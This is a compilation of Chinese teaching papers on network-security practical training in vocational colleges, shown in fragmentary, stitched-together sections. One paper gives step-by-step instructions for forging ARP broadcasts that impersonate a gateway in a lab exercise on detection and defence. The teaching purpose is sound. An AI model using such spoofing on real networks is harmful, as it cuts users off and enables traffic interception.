时间:2022-11-30 17:00:52
开篇:写作不仅是一种记录,更是一种创造,它让我们能够捕捉那些稍纵即逝的灵感,将它们永久地定格在纸上。下面是小编精心整理的12篇网络安全实训总结,希望这些内容能成为您创作过程中的良师益友,陪伴您不断探索和进步。
1.1校企共建实训教材
职业院校的培养目标是技能型应用人才。通过和企业合作可以加强学生的就业能力,首先对企业进行调查研究,针对企业网络对人才的应用需求,依照企业岗位所要求的职业技能,与企业共建实训教材。要参照国家相关的职业资格标准,改革课程项目实训的教学内容,实现企业和学院共同编写实训教材的方案[3]107-108。我们编写的校本实训教材适合学生的水平和需求,不但提高了学生学习兴趣,而且让他们从实践中提高了网络技术实际应用能力。
1.2搭建实训虚拟平台
网络技术专业课程原理较多并且设置复杂,如果单纯地使用裸机和真实设备来配置,不仅不能满足需求,而且设备昂贵,易于损坏。项目实训实验结合企业网络工程项目,按照企业网络实施流程来完成案例[4]25-27。实训中采用Windows Server、Linux和GNS3软件和ASA防火墙等模拟路由器和防火墙,让虚拟机和真实机桥接。该仿真平台使教师教学方式灵活,学生不但易于理解和实现,而且调动了学生的学习积极性。使用虚拟机软件VMware练习操作系统的安装、设置和维护,避免因学生的误操作对系统造成损坏使实训终止。它能帮助学生顺利地在计算机上安装操作系统,完成修改和设置而不影响真机的正常运作。使用模拟软件进行路由器和交换机的配置,实现真实的网络环境,让学生能够在模拟软件中体会到路由器、交换机在企业网络环境中的具体应用和配置,为以后的网络安全管理工作奠定基础。
1.3企业案例实训
案例实训是在实践中学习,将所学知识应用在实验中。通过对案例的学习,学生可以掌握Windows Server、Linux操作系统的安装、设置、维护和管理,学会桥架、管线、机柜和六大子系统的综合布线,熟悉交换机、路由器、防火墙和无线AP等的配置管理。企业案例的选取来源于企业,学生根据实训的目标,采取小组讨论选取组长、资料查阅记录、流程实施和报告撰写等形式完成实训任务。教师在施工现场有选择地指导,由小组长答辩,教师根据实训中出现的问题进行解答,最后评定实训成绩。企业案例实训培养了学生的职业技能。在项目实训中,从网络环境构建、操作系统设置、网络设备安装、网络设备安全配置到安全测试验证,一整套的项目实训下来,学生获取工作中有用的知识,教学中做到知识训练与实际工程项目职业能力衔接,为职业院校提供新的实践教学模式。网络设备的安全技术内容也是一个重要的实践内容,让实践教学充分体现职业教育的特点。
1.4企业顶岗实训
1学生顶岗实训
首先完成章节项目的实训,章节项目的实训是小案例实训,结合每一章节的具体内容来实施。其首先使用模拟软件来模拟,然后用虚拟机安装相应的软件来实施网络操作系统设置、交换机、路由器和防火墙安全案例。对于Windows Server的高级设置和维护、Linux的安全管理、ACL配置、NAT和防火墙等技术,讲解时要精讲,项目案例实训时要精练。其次完成综合项目的实训。综合实训是在本课程全部完成后进行,根据企业网络实际需求搭建安全和便于管理的网络。模拟企业网络环境,组建企业网络,进行网络操作系统搭建、网络环境的构建和网络安全技术的技能训练。通过项目综合实训学习,学生能够根据企业办公环境、需要的信息点数量以及网络拓扑图进行综合布线,安装和设置操作系统,配置交换机、路由器和防火墙安全设备,使用管理软件监控企业网络的运行状态,并采取安全技术保证企业网络的安全,使其正常运作。最后是顶岗实训,安排学生到企业进行实训,切实感受真实网络环境,发现网络安全隐患,掌握网络操作技术、网络设备配置技术和网络安全管理技术,提高处理网络故障的实际能力。项目实训的成绩考核方式要灵活,将企业和学校双方结合,给学生以中肯的评价,以能力为主,为学生就业打下坚实的基础。
2教师顶岗实训
深入企业第一线,了解企业网络所需要的工作岗位和技术能力,全面跟踪学习综合布线、网络应用操作、网络安全管理和网络云计算服务等方面的技术岗位;然后反馈到网络技术专业教学实践改革中,更新校企共建实训教材,将企业中的新知识、新技术和新的管理理念引入,做好与企业网络技术人员的良好沟通,丰富实训教材内容,提高教学质量。
2总结
关键词:网络安全;实验教学;教学设计;教学手段
中图分类号:TP393 文献标识码:A 文章编号:1009-3044(2016)31-0107-03
1 引言
网络安全课程本身原理部分晦涩难以理解,实验部分涉及技术众多,涵盖多个专业课程的知识点,因此也是一门与其他学科交叉性极强的实践性课程。根据学科特点和岗位能力培养目标,从基本学情出发,研究设计了符合教学目标和学生认知特点的教学方案,有效完成了教学任务,提高了学生的学习能力
2 教学基本情况分析
网络的便捷带给用户很多网络使用效率的困扰,包括带宽拥塞、关键应用的服务质量QoS无法保障、病毒请求消耗带宽、网络攻击导致服务中断等问题。上网行为管理作为网络安全管理的重要内容,能够实施内容审计、行为监控与行为管理,同时可以动态灵活控制网络速率和流量带宽,很好地满足各行业网络安全管理的需要。
同时,上网行为管理也是计算机技术专业的“网络安全与运维”典型工作任务中的一个技术技能训练单元。在专业职业岗位需求分析的基础上确定了本实训单元的技术技能训练要求。课程内容根据《网络安全与防护》课程标准中制定,同时参考了神州数码网络安全岗位认证系列教材的相关内容。我们依据技术技能人才培养方案,立足地区网络安全管理人才需求,结合学院现有设备优势,将实训的内容设计为上网行为管理的基本概念、常用设备及架构、校园网络上网行为管理的规划与实施、上网行为管理的日常运维与分析四个部分[2]。
教学对象是高职高专二年级学生,已经具备计算机网络基础知识、路由与交换、局域网组建等相关知识和技术技能。但尚未达到网络安全运维的实践能力要求,隐形知识也有待显化。从往届生的学习情况来看,课后对知识的复习巩固性练习积极性不高。尤其是对动手配置的内容,很多同学只能按照教材按部就班地进行,不善于思考,只限于对配置操作的记忆。因此结合技术技能人才培养要求,我们以职业技能训练和岗位能力培养为教学组织原则,结合案例分析、实际操作、模拟现场、课后实践等多种方式进行实践内容教学,充分利用实训室现有网络设备和各类信息化教学平台和手段,突出“以学生为主体”和“学做合一”的特点,完成本次教学任务。
基于以上分析,教学目标确定为三方面。首先是知识目标。要求学生掌握上网行为管理的基本概念,熟悉上网行为管理常用设备,了解此类设备的关键技术,熟悉上网行为管理常用架构。二是技能目标,学生能够规划校园网络上网行为管理方案,能够实施上网行为管理方案,能够对常见设备进行运维管理及分析。三是素养目标方面,希望学生具备安全操作意识,有用良好合作协调能力、自我学习能力和创新和应变能力[3]。
3 教学设计
3.1 课前活动
为了培养学生的自我学习和自我管理能力,同时利用网络教学平台突破空间限制,扩展师生互动范围,提升学生个性化和差异化的学习体验。教师会在课前上传课前任务书、学习资源、考核标准到超星网络教学平台,并通过该平台预学习任务;同时,通过超星移动APP、QQ群、微信预习通知;教师收到学生的课前测验结果后,及时批改测验结果,了解不同学生的认知基础的差异,灵活调整课堂教学策略,适当调整教学方法。学生收到预习通知后查看任务书;针对本单元中用到的各类硬件设备,提前调研其性能及技术参数;同时学生可以利用实验室的环境设备进行安全的探索操作;完成课前预习报告后学生提交到超星网络教学平台并在平台上独立完成课前评价表的填写。
3.2 课堂活动
课堂教学部分,教师首先创设教学情境,设计出三个教学活动,引导学生分组讨论,完成实验环境的搭建,从而引出本单元学习内容;然后教师利用奥易课堂教学软件下发任务书,并做出简要说明。在学生完成过程中针对个别学生的提问做差异化指导,通过奥易教学软件统一监控。最后教师引导学生总结归纳本单元课堂教学的主要内容和实验思路、故障分析解决思路。
与此同时学生要完成一下工作。首先针对创设情境,分组讨论、展开头脑风暴并总结表述讨论结果,复习已有知识技能,独立完成实验环境的搭建;其次结合下发的任务书,组员间讨论分析项目的需求,检查项目实施的环境及准备工作是否完整。然后讨论制定项目计划,确定项目实施的方案;第三观看教学视频,独立完成9个任务的实施和验证;第四针对拓展任务,分组讨论,分析问题,提出解决方案,给出实施计划,确定实施方案;第五划分不同角色,组员间协作完成拓展任务的实施和验证;拓展任务结束后,其中一组简要汇报任务的完成情况,由师生对其共同点评;接下来学生结合教师给出的新的网络场景,分析总结出常见上网行为管理时有可能出现的网络问题,以及常见的分析和解决方法;最后独立完成课堂评价表的填写。
3.3 课后活动
关键词:ARP欺骗攻击;网络安全意识;问题情境;职业素质
中图分类号:TP393 文献标识码:A 文章编号:1009-3044(2015)35-0100-03
Abstract: This paper aims to integrate the network safety consciousness, real problem situation, professional quality concept into the college experimental teaching process under the strategy of network power, to stimulate students' enthusiasm and initiative, and guide students to find, analyze and solve the problem, to sum up the experiment in the form of lists. Ultimately, the "student oriented, supplemented by teachers" teaching ideas are reflected, and students' practical ability are enhanced.
Key words: ARP spoofing;network safety consciousness; problem situation; professional quality
1 引言
2014年来,中央网络安全和信息化领导小组组长多次提出了“没有网络安全就没有国家安全”以及“建设网络强国”的重要论断。2015年政府工作报告提出的“互联网+行动计划” 体现出信息化对网络发展巨大推动作用和以网络为载体的数据驱动巨大魅力的同时,也呼唤着人们通过网络的进一步发展来不断提升网络安全的能力和意识。两届国家网络安全宣传周活动的开展也为加强全民网络安全宣传教育、提升网民的网络安全防范意识和技能提供了良好的途径。
网络安全上升到国家战略层面,各类网络攻击和窃取事件的频发驱动信息安全需求急剧增加,目前网络安全普遍存在的问题是信息安全意识不强、缺乏整体安全方案、没有安全管理机制、系统本身不安全以及缺少必要的安全专才。
网络安全意识比技术更重要。作为培养网络专业技能人才的一线高校教师,在平常实验教学中除了借助各种安全设备和环境完成实训内容外,更重要的是提升学生的安全意识和处理安全事故的能力,在提高专业技能水平的同时培养学生的职业素质,因此设计好网络安全实验课程显得尤为重要。本文以ARP欺骗攻击与防范实验教学为例,探索在真实网络安全情境下,新型安全课程实验教学模式的改革以及教学效果。
2 ARP欺骗攻击原理
ARP协议是以太网等数据链路层的基础协议,负责完成IP地址到硬件地址的映射。工作过程简述如下:1)当主机或者网络设备需要解析一个IP地址对应的MAC地址时,会广播发送ARP请求报文。2)主机或者网络设备接收到ARP请求后,会进行应答。同时,根据请求发送者的IP地址和MAC地址的对应关系建立ARP表项。3)发起请求的主机或者网络设备接收到应答后,同样会将应答报文中发送者的IP地址和MAC地址的映射关系记录下来,生成ARP表项。从ARP工作机制可以看出,ARP协议简单易用,但是却没有任何安全机制,攻击者可以发送伪造ARP报文对网络进行攻击。伪造ARP报文具有如下特点:伪造的ARP报文中源MAC地址/目的MAC地址和以太网帧封装中的源MAC地址/目的MAC地址不一致;伪造的ARP报文中源IP地址和源MAC地址的映射关系不是合法用户真实的映射关系。目前主要的ARP攻击方式有如下几类:仿冒网关攻击、仿冒用户攻击(欺骗网关或者其他主机)、泛洪攻击。
3 问题情境设计
教学情境是课堂教学的基本要素,有价值的教学情境一定是内含问题的情境,它能有效地引发学生的思考。问题情境的创设,对于学生学习兴趣的激发起着决定作用。因此,如何设计具有一定情绪色彩的、以形象为主体的生动具体的场景,以激发学生一定的情感,就成为教学之初需要考虑的问题。
在一个没有防御的园区网中爆发的ARP病毒会造成网络丢包、不能访问网关、IP地址冲突等问题,实验室所有主机分配的是同一网段IP地址,接入交换机,预先在教师机上开启Sniffer嗅探者软件,运行数据包发生器,修改后的ARP广播报文会持续被发送到当前局域网中,为学生建立一个真实园区网面临的问题情境,接下来引导学生按照“发现问题-分析问题-解决问题”的顺序完成实验内容,提升自己的安全意识和实践能力。
4 实施过程
4.1 实验环境
实验室所有主机处于同一网段,类似如下所示的拓扑图环境:
4.2 问题情境的构造
教师机IP地址为172.16.75.105,在本实验中充当攻击者身份。首先构造用于攻击的ARP欺骗报文,在Sniffer软件上定义好过滤器后,开始捕获报文,首先将教师机的ARP缓存清空,尝试PING网关,停止捕获并显示结果如下图所示,
发送当前的帧之前做如下修改:(1)更改源IP地址为网关IP地址;(2)更改源MAC地址为伪造的MAC 地址11-22-33-44-55-66;(3)更改目的IP地址为任一同网段主机IP地址;(4)更改目的MAC地址为全F值。设置为连续不断地发送帧,启动数据帧发生器,此时当前网段会充斥着此类ARP广播报文。
4.3 问题情境的呈现
以4-5人为一组,以真实的网络管理员遇到的企业局域网故障为案例,向学生说明经常受到的网络攻击来自于网络内部,表现为访问互联网时断时续,打开网页或下载文件的速度明显变慢,甚至无法访问公司的Web服务器等资源,严重影响了企业办公业务的正常运行,公司领导对此很不满意,要求立刻彻底解决问题。要求在实验报告上完成每步测试内容并填写检查结果。此环节注重引入职业教育理念,既要注重技能锻炼,又要注意素质培养。立足本职岗位,敢于承担责任,从工作中发现问题是什么,为什么到怎么做,同时培养学生的团队意识。
4.4发现问题
此环节旨在让学生运用已掌握的网络维护技能发现当前局域网存在的问题,通过观察学生在测试环节中采用的方法,可以了解到学生能否快速有效地定位网络中的故障,在不投入新的设备情况下解决问题。
通过观察,多数学生会按照如下测试步骤检测网络状况:1)检查本机网络连接情况及IP地址是否有效;2)检查与同一网段内其余主机连接情况;3)检查与网关连接情况;4)检查与DNS服务器连接情况;5)检查与Web服务器连接情况。这一过程旨在帮助学生基于收集到的测试数据判断问题症结点的能力,只有在充分调查研究的基础上具体问题具体分析,才能把存在的问题症结点找准、找实、找透,才能开对方子,做到对症下药。
4.5分析问题
根据课堂反映来看,绝大多数学生在实施到第3步时发现PING网关IP地址不通,并且重启机器后症状依旧,没过多久又会产生丢包现象。不少学生通过使用ARP -a命令发现学习到的网关MAC地址是伪造的11-22-33-44-55-66,进而判断出问题在于网关MAC地址被篡改,通过使用Sniffer软件,可以嗅探到局域网内充斥着大量的ARP报文,并且通过抓包分析,发现源IP地址为172.16.75.254的网关的MAC地址为11-22-33-44-55-66。此时需要引导学生去思考两个问题:一是为什么主机会无条件更新,二是如何防范此类错误。结合课本上提到的TCP/IP协议栈的脆弱性,部分同学会得出主机并不对收到的ARP报文进行检查,从而导致PC主机更新本机ARP缓存里的网关MAC地址的结论。
这个分析问题的过程注重培养学生遇到问题的应变能力,这种能力的训练对于今后可能从事的网络运维岗位而言,是非常有必要的。
4.6 解决问题
明白了问题的原因,如何解决问题就是一个水到渠成的过程。通过几分钟分组讨论的形式,最后总结了几组的意见,归纳出两种解决思路:一是主机对于收到的ARP伪造报文不进行更新操作,二是限制此类ARP广播报文在局域网内的泛洪。此时,结合实训指导书内容,教师提出两种解决方案让学生选择,一是在局域网内各台主机上静态绑定正确的网关MAC地址,这样即使主机收到了虚假MAC地址也不予以更新;二是在交换机各端口上设置单位时间内允许通过的ARP报文数量的阈值,超过阈值则关闭端口。同时让学生分组讨论,对这两种方案的优缺点进行比较,最终得出如下的结论,方案一因为要在局域网内每台主机上配置命令,工作量较大,网关MAC地址一旦改变又得重新配置,而且治标不治本,不能有效遏制网段内ARP报文造成的广播风暴,网络传输性能较低;方案二只需在交换机端口上进行配置,与网关MAC地址无关,如果再在端口上划分好VLAN,将会进一步限制广播报文的传输范围。
4.7 实验总结
总结既是自己对于实验的理解归纳,也是对整个实验过程的回放,既要总结有所收获的地方,也要归纳出不足之处。通过将实验全过程中涉及现象、情境及步骤列成问题清单,让每位学生都能从实验中总结出得与失。最后借鉴翻转课堂的思想,邀请一位学生就实验目的、方法、步骤进行口头陈述,由其余学生进行补充,从而获得更深层次的理解。
5 结语
通过网络安全实验课程的教学尝试,以及学生的反映来看,收到了一定成效。总结起来达到了三个目的,一是探索网络安全意识、网络安全技能并重的新型网络安全实验教学方法,二是引导学生进入实际问题情境中,深入角色,积极主动地去发现、分析及解决问题,三是将个人责任感、团队合作等职业化素质理念融入到教学过程当中,培养主人公意识。在教学过程中需要注意对于课堂进度以及时间的把握,如学生遇到难点应及时进行引导,推动进程。
参考文献:
[1] 迟恩宇,刘天飞,杨建毅,王东.网络安全与防护[M].电子工业出版社,2009.
[2] 叶成绪.校园网中基于ARP协议的欺骗及其预防[J].青海大学学报: 自然科学版,2007(3):59-61.
[3] 秦丰林,段海新,郭汝廷.ARP欺骗的监测与防范技术综述[J].计算机应用研究,2009(1):30-33.
[4] 孟令健.计算机网络安全ARP攻击行为的防范研究[J].齐齐哈尔大学学报: 自然科学版,2013(3):9-11.
[5] 郭会茹,杨斌,牛立全.ARP攻击原理分析及其安全防范措施[J].网络安全技术与应用,2015(6):5-6.
[6] 刘名卓,赵娜.网络教学设计样式的研究与实践[J].远程教育杂志,2013(3):79-86.
摘 要:针对当前计算机网络教学和目前中等职业技术学校计算教学的现状,结合当前计算机网络技术的发展和实际状况,结合中等职业技术学校的学生特点,综合网络实际使用和培训的状况,对计算机网络教学进行详细的分析和研究,尝试寻找到一条适合中职计算机网络教学方式,行成一套行之有效的教学方法。关键词:中职计算机教育 计算机网络技术 网络教学中图分类号:G712
文献标识码:A
文章编号:1672-3791(2013)07(b)-0181-01现代社会的网络技术已经成为了人们日常生活的重要组成部分,随着网络技术的发展和变革,社会和工作与网络技术的关联性越来越频繁,越来越不可或缺。无论是在企业还是在家庭,生活的每一个环节现在都在利用日益发展的网络技术进行连接。从简单的网站建设到复杂的物流网,数据库管理,都与网络技术息息相关。针对如此高速发展的网络技术产业,催生了大量的网络技术人才的需求,同时对网络技术的专业人才要求也提出了很高的要求。在中等职业技术教育的课堂上,计算网络作为一门非常具有实用性的课程,已然已经成为非常重要的一个学科。因此,对该课程的教学工作也提出了很高的要求。本论文就计算机网络实际操作的教学内容,教学计划和教学方法进行了了研究和讨论。1 计算机网络实践教学的教学大纲与教学计划为了让学生综合利用所学的网络知识,拥有一些解决实际问题的能力,能够完成一些简单的网络管理、组建、维护等工作,中等职业技术教学中设计了计算机网络课程,同时也对网络知识的基本了解和基本设置了一些教学任务。应对网络在日常工作和生活中的应用、网络技术的发展、网络应用中常出现的问题的解决方法,让学生对网络环境的现状和基本的问题做出准确判断,制订出符合学生实际能力的教学大纲。对学生的实际网络基础知识的能力评估后,针对职业技术学校学生实际的基础水平,因人而异的设计一个侧重于学生实际操作能力培养和锻炼的教学计划,重点锻炼学生在实际环境中对网络技术的应用。2 计算机网络实践教学的内容2.1 基础网络知识实训基础实训的主要目的是培训学生掌握基本网络组建的能力,通过培训,要求学生能够掌握基础网络组建和实施的能力,能够独立完成基础的小型局域网络的构建并对构建的网络进行验证,对出现的问题能够有解决方案。实训内容包括:ADSL拨号上网的设置、制作双绞线(直通线和交叉线)、设置多台PC共享上网、配置WIFI路由器、基础交换机的配置、基础路由器配置、交换机的级联和链路聚合配置、使用交换机划分VLAN等。通过这些实训,要求学生能够独立操作构建一个小型综合性网络环境,从设计、布线、配置到检查纠错的全过程,掌握一个较为全面的基础网络设置能力。2.2 网络管理实训管理类实训的目的是培养学生管理网络的方法和技术,使其在未来的工作中拥有这方面的能力。这实训主要内容包括有:使用工具软件分析网络数据、学习掌握端口和MAC地址的绑定的知识、了解交换机的端口镜像、了解虚拟专用网VPN的配置、学习IP地址的配置规划、掌握基于802.1x的配置方法、了解网络带宽的监控维护等。通过这些实训,使学生基本掌握针对网络设备的管理、故障处理、性能管理、网络认证和费用管理等方面的能力,能够进行初步的网络管理工作。2.3 网络综合能力实训综合类实训的目的:提高对网络综合应用能力,使学生部分满足较为复杂的网络环境的工作。这方面的实训主要有:树协议的启用方法、三层交换机的VLAN配置、配置ACL访问控制列表、静态路由配置、动态路由RIP配置、动态路由OSPF配置、利用单臂路由配置VLAN间互访等,这一部分为实训为更高级别的网络知识培训,对那些有一定兴趣且基础比较扎实的学生,通过这部分的实训可以学习并掌握更加大范围的网络环境的知识,能够掌握大型网络的建网和配置的方法。2.4 网络安全实训这类实训的目的:通过实训,使学生能够在防止网络侵入、网络攻击等方面掌握一定的专业能力,能够通过网络安全的配置和对设备的理解应对一般的网络攻击行为。实训内容包括:网络行为策略配置、网络监听、操作系统安全配置、防火墙的透明模式和NET配置、数据备份与恢复等。通过此类实训,使学生掌握一定的网络安全相关技能。网络安全是整个网络技术的最顶端的技术,对于中职的教学,要求学生以了解和开阔视野为目的,初步了解网络安全方面的知识。3 网络技术实践教学法对于计算机网络教学,如何提高学生对该课程的兴趣是教学的最基本技巧。教学方法的重要性就体现在如何在枯燥的教学中找到兴趣点,给学生提高成就感。基于上述的要求,我总结了以下几个教学方法。3.1 项目教学法在课堂上提出一个网络构建的项目,让学生以小组为单位完成整个网络环境的设计,规划,配置和检查。给学生创造一个项目成功的成就感,同时加深对所学知识的掌握程度。3.2 示范教学法老师直接向学生展示一个复杂的网络配置中使用到的技巧和方法,让学生充分认识到网络技术的千变万化,提高学生深入学习的兴趣。3.3 网络教学法让学生带着问题去网络中寻找他们想要找到的解答方法,通过网络学习网络知识,让学生了解最新最前端的网络知识,以此来弥补课本上没有提及的最新资讯和学习内容。在实际教学中,需要结合多种教学方法,以教学方法为项目教学法,项目是学会使用互联网。实训项目教学突的关键是培养学生独立思考问题、解决问题的能力。因此在实训中,要重点在这方面加强辅导和培养。这样的实训教学可以提高学生掌握知识的,切实提高学生对该课程知识的掌握,提高他们进入社会和工作岗位后的工作能力。4 结语计算机技术的快速发展,对计算网络教学提出了更高的要求。教师在教学中必须在深入了解社会和企业的实际需求情况下,结合学生的特点进行更加侧重于实际操作的教学,让学生在实训中发现问题,分析问题并且解决问题。教师在整个教学过程中更多的应该扮演一个引导、倾听、引导和观察的角色,以学生自己的思想作为学习的基本中心思想来学习。让学生充分感受的“今天所学、明天所用”的学以致用的思想。学生在这样的思想驱动下子让可以很快的提高学习的兴趣,做到自主学习,并且在走出校门踏上工作岗位后可以快速融入岗位。参考文献[1] 计算机网络[M].清华大学出版社,2008.[2] 孙宪君,吕滨.计算机网络操作系统原理与应用[M].机械工业出版社,2006.
【关键词】项目化教学;计算机网络技术;项目设计;应用
一、项目化教学法的含义
项目教学法是师生通过共同实施一个完整的项目工作而进行的教学活动。即以项目为载体,以工作任务为中心,行为导向为方法,以能力培养为目标,旨在将课堂教学与工作情境完美地结合起来,让学生融入更有意义的工作任务中,通过任务的完成,让学生自主学习、自我提高,实现知识的积累、能力的提高和素质的培养。其目的在于加强课程内容与工作之间的相关性,整合理论与实践,提高学生技能培养的效率。
二、《计算机网络技术》课程教学目标
本课程的教学目标是使学生掌握计算机网络基础理论及网络组建技术,掌握目前应用最广泛的TCP/IP协议的基本知识,会组建小型局域网,会安装、配置常用的网络服务,能为各种常用的网络服务提供技术支持,能管理小型网络,对在网络运行过程中出现的故障进行排除和解决,能保证网络安全稳定的运行。要想实现这一教学目标,必须深化改革,采用有效的教学方法——项目化教学,让学生在项目学习中具备局域网组网与管理的能力。
三、《计算机网络技术》课程采用项目教学法的必要性
(1)目前在计算机网络技术课程教学中存在理论和实践相脱节的现象。教学内容理论性太强,一般教师在讲授计算机网络课程时更多的是采用传统教育管理和教学模式。首先,对计算机网络的概念、发展、硬件组成等内容进行介绍;其次,介绍OSI七层模型、TCP/IP 协议、各种网络的功能;最后,介绍网络的应用与网络安全的防范等知识。这种传统的教学模式看起来教师已经把计算机网络知识全部传授给了学生,但对于学生来说如何管理和维护一个网络仍无从下手,学生对计算机网络的认识只停留在书本上。(2)教学手段和方法单一,教学效果不好。教师在讲授计算机网络课程的过程中,最容易犯的毛病就是“满堂灌”。内容理论性强,相对枯燥,学生看不到又摸不着,很快会对计算机网络从感兴趣到失去兴趣,这会直接导致学生上课走神、不听课、教学互动差,达不到教学效果。针对平时教学中存在的问题,我们进行教学改革,改革教学手段和教学方法,把项目教学法引入网络技术课堂中,可大大地激发学生的学习热情,使理论学习与岗位实践需求统一起来。
四、项目教学法在《计算机网络技术》课程中的实践应用
(1)项目设计。项目教学法是师生通过共同实施一个完整的项目工作而进行的教学活动。首先要设计典型、实用的项目。按照教学内容的需求,结合网络真实的市场需求及学校的实际情况,选取现实的对象、材料为项目,项目既要包含基本的教学知识点,又能调动学生解决问题的积极性,还便于学生对知识的迁移和融会贯通。如组建一个小型局域网络这一项目,主要是培养学生组建网络、管理网络的能力,要求学生通过项目实训熟悉网络工程的实施流程和方案设计方法,完成小型家庭办公网络的构建。根据这一过程,可将其分成7个子项目:小型局域网的需求分析及可行性论证;小型局域网网络规划;组网设备及预算;网络施工(虚拟网络环境/架设部分网络);接入Internet;网络安全与管理;签合同及技术文档。(2)项目实训内容。为实现各个子项目,我们将每个子项目划分为若干个任务。如小型局域网需求分析及可行性论证需掌握网络的基本理论知识,网络系统组成、网络分类、传输介质、网络通信协议、网络操作系统及网络安全等知识,此项目要求学生根据客户需求,灵活运用网络知识设计网络方案。小型局域网网络规划包括使用Visio软件绘制网络拓扑图、思科模拟器(Packet Tracer)的安装及使用、根据实际需要布线。组网设备及预算包括双绞线的制作、光纤熔接。网络施工(虚拟网络环境/架设部分网络)包括Virtual PC安装、服务器端及客户机端操作系统安装、双机互联、多机互联、IP设置及划分、交换机的基本配置及级联、划分VLAN、使用路由器的基本配置、网络资源共享。架设网络服务包括Active Directory安装与配置、DNS安装与配置、DHCP安装与配置、WWW服务器的安装与配置、FTP服务器的安装与配置、邮件服务器的安装与配置六个任务。接入Internet包括常用的局域网接入Internet方法:ADSL接入方式、“光纤+LAN”的因特网接入、无线接入方式(组建Ad-hoc模式网络、组建Infrastructure模式网络)。局域网共享Internet连接(文件共享和打印机共享),还会涉及网络命令及网络故障诊断实训内容。网络安全与管理包括系统自带的安全管理工具、计算机网络安全措施两个任务。这方面的实训主要有:使用抓包工具软件分析网络数据、交换机的端口镜像、端口和MAC 地址的绑定、服务配置、网络带宽的监控维护等。签合同及技术文档,让学生了解合同的使用方法及注意事项。(3)项目实施。一是创设教学情境。项目教学法主要是以项目引领,任务驱动贯穿整个教学。教师要创设与教学内容相关的教学情境,引出项目后应适时以恰当的形式告之学生具体而明确的学习目标和任务,分析出教材中的重点、难点,提炼出教材中的要点,精心编写一些典型的。把理论讲解和技能训练统一安排,把老师活动和学生活动统一安排,把教学过程和自主学习统一安排。二是改革教学手段和教学方法。《计算机网络技术》是一门理论性和实践性都很强的课程,要使项目教学法成效显著,必须重视网络实训环境的建设,有相应的硬件设备和软件配置,保证大部分项目实训能够实现。对于某些不能实现的子项目要安装模拟软件、建立虚拟实验室和参观校园网络建设来达到目的。还要将多种现代化教学手段引入课堂。教学方法多样化,如类比教学方法,把网络中一些枯燥、抽象的计的概念用实际生活中人们熟悉的事物与理论进行类比,帮助学生直观、形象地理解和掌握计算机网络理论知识,使抽象、神秘的问题变得通俗易懂。(4)项目评价。学生学习的效果直接由完成项目的情况来衡量,先是对学生参与的学习成果进行评价。各单项任务的完成情况,这些项目任务能体现本门课程的知识和技能。如绘制实训室网络拓扑图;双绞线制作;双机互连的完成情况。然后教师再根据学生参与项目教学的态度和创造性,解决实践中问题的能力,评判学生的自学能力与解决问题的能力。完成任务过程中的态度、表现,还从另一个侧面反映学生的综合素质,只要项目任务设计适当,考核方式合适,就能很好地调动学生自主学习的积极性,较好地实现课程的教学目标。可包括教师评价、学习小组评价和自评三部分。除了对学生的学习项目完成情况进行评价外,教师还应在教学项目完成后及时进行总结反思,对项目教学过程中出现的问题及考核过程中出现的问题进行细致分析和研究,及时完善项目内容及考核方法,为下次教学积累经验。
五、结语
《计算机网络技术》课程是内容多,范围广,知识更新快,且理论性和实践性都很强。作为教师,我们必须紧贴网络实际情况,设计典型实用的项目,从真实的网络应用入手讲解网络的组建、应用、管理和维护,提高学生分析问题、动手能力和解决实际问题的能力。只要把项目教学法用好用活,学生就会感到学这门课程是非常有用的,会积极地投入到项目学习中去,更好地实现既定的教学目标。
参 考 文 献
关键词 说课 信息安全 教学 课程
中图分类号:G424 文献标识码:A
0 引言
本课程为信息安全专业职业岗位课程,服务于高职高专人才培养规划,坚持以行动任务为导向,工学结合培养为主线的人才培养模式。培养学生从事网络安全方案设计、网络操作系统安全部署、网络维护、信息安全管理等相关工作。本文从课程定位与目标、课程设计、教学内容和组织、教学组织与实施、实践条件与教学效果、教学队伍、教学改革与特色创新七个方面对课程进行详细的阐述,对教学理念进行符合高职教学规律的深层次的梳理。
1 课程定位与目标
1.1 岗位需求(如图1)
1.2 课程定位
信息安全基础是高职高专3年制信息安全专业的一门必修职业基础课程,一般安排在第一学期开设,在专业课程体系中起着引领专业课程体系的作用,其后续课程为安全防护工具、服务器安全防护和防火墙配置应用。
1.3 课程学习目标
(1)学习能力目标。通过本课程的学习,进一步培养学生的自主学习能力,掌握网络安全防护的基本过程和方法。
(2)职业能力目标。了解我国网络安全状况和相应的政策和法律法规,熟悉网络安全防护项目的实施过程和要领,能够熟练进行客户机和服务器加固操作,能够设计和实施中小型网络的安全防护方案,了解大型网络安全防护方案的设计与实施要领。
(3)职业素养目标。通过项目设计培养学生的统筹规划能力和工程文档编写能力,通过项目合作培养学生的团队合作意识和能力。
2 课程设计
以培养学生从事网络构建、网络管理与维护工作岗位所需的知识与技能为中心来组织教学。信息安全基础的课程开发流程:市场调研与召开实践专家研讨会 确定相关职业岗位群的典型工作任务 归纳行动领域 行动领域转换为学习领域 学习情境设计 学习子情境设计 课程教学资料建设 实际教学检验。为了保障课程与技术发展相一致,建议完成每个教学周期后,课程组均要依据以上课程开发流程对课程标准和课程内容进行修订。
3 教学内容和组织
3.1 教学内容选取
根据当前网络安全项目的规模,可将网络安全防护客户划分为普通网络用户(ADSL接入)、中小型网络和大型网络,由此根据教学单元设计内容涉及信息安全基础知识、信息系统安全体系、信息加密技术和网络安全实用技术方面来确定网络安全防护学习领域的学习情景如图2。
3.2 教学内容子情境设计组织
(1)普通网络用户安全防护学习子情境设计如表1。
(2)中小型网络安全防护学习子情境设计如表2。
(3)典型校园网全防护学习子情境设计如表3。
4 教学组织实施与重点难点
4.1 教学组织实施
在整个教学过程中,学生一般以小组的形式进行工作学习。在任务工作过程系统化设计情境学习中,要求每个小组选出一名同学担当组长,组长的职责是负责全队的组织协调,分配任务,组织讨论,提交实践报告,成果演示录像呈现,给其他组员评分等。
在具体实施教学过程中,本课程组把基于工作过程教学模式中的六步行动过程总结为教学中的四个环节:任务明确、教师示范、学生实践、展示评价。在这四个环节中,分别把握学生应该掌握的知识和任务,顺利完成教学和对学生的训练。
4.2 教学重点
普通网络用户安全防护方案的制定与实施:由教师首先讲解并演示Windows XP的安全防护操作,学生先学后做;教师指导学生进行Vista安全防护方案的设计与实施,学生边学边做;教师组织学生自主进行Windows 7安全防护方案的设计与实施。
中小型典型网络的安全防护方案的制定与实施:由教师讲解典型网站安全防护方案的设计与实施,学生先学后做;教师指导学生进行典型网吧安全防护方案的设计与实施,学生边学边做;教师组织学生自主进行典型企业网络安全防护方案的设计与实施。
